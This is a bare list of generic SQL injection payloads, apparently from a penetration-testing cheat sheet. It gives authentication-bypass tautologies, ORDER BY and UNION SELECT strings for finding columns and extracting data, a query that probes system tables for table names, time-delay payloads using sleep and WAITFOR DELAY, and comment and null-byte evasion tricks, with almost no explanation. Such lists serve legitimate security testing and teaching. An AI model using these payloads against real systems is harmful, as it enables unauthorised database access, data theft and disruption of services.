001 - Generic SQL Injection Payloads

# Generic SQL Injection Payloads

```sql


`

,

""
/
//
\
\\
;
' or "
-- or #
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
'='
'LIKE'
'=0--+
OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2
%00
/*…*/
+ addition, concatenate (or space in url)
|| (double pipe) concatenate
% wildcard attribute indicator

@variable local variable
@@variable global variable

# Numeric
AND 1
AND 0
AND true
AND false
1-false
1-true
1*56
-2

1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+

1' ORDER BY 1,2--+
1' ORDER BY 1,2,3--+

1' GROUP BY 1,2,--+
1' GROUP BY 1,2,3--+
' GROUP BY columnnames having 1=1 --

-1' UNION SELECT 1,2,3--+
' UNION SELECT sum(columnname ) from tablename --

-1 UNION SELECT 1 INTO @,@
-1 UNION SELECT 1 INTO @,@,@

1 AND (SELECT * FROM Users) = 1

' AND MID(VERSION(),1,1) = '5';

' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --

Finding the table name

Time-Based:
,(select * from (select(sleep(10)))a)
%2c(select%20*%20from%20(select(sleep(10)))a)
';WAITFOR DELAY '0:0:30'--

Comments:

# Hash comment
/* C-style comment
-- - SQL comment
;%00 Nullbyte
` Backtick

```
